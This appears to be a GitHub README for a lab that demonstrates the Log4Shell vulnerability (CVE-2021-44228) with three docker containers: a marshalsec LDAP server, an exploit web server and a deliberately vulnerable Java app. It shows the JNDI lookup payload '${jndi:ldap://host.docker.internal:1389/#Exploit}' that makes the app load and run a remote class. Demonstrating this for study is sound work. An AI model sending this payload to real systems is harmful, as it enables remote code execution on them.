chilliwebs/CVE-2021-44228_Example

Dockerfile

CVE-2021-44228_Example

Run each of the 3 sections in a spearate tab/console

marshalsec LDAP server https://github.com/chilliwebs/marshalsec (Forked from https://github.com/mbechler/marshalsec)

docker build -t marshalsec marshalsec/.
docker run -it --rm -p 1389:1389 --add-host=host.docker.internal:172.17.0.1 --name marshalsec marshalsec

The Exploit Web Server

docker build -t exploit ./exploit
docker run -it --rm -p 8888:8888 --add-host=host.docker.internal:172.17.0.1 --name exploit exploit

The Guinea Pig java app (running vulnerable versions of java and Log4J)

docker build -t guinea_pig guinea_pig/.
docker run -it --rm --add-host=host.docker.internal:172.17.0.1 --name guinea_pig guinea_pig

When running the guinea_pig you should see the following logged:

PWND!
[main] ERROR gp.GuineaPig - ${jndi:ldap://host.docker.internal:1389/#Exploit}

"PWND!" is logged from an externally injected class (Exploit)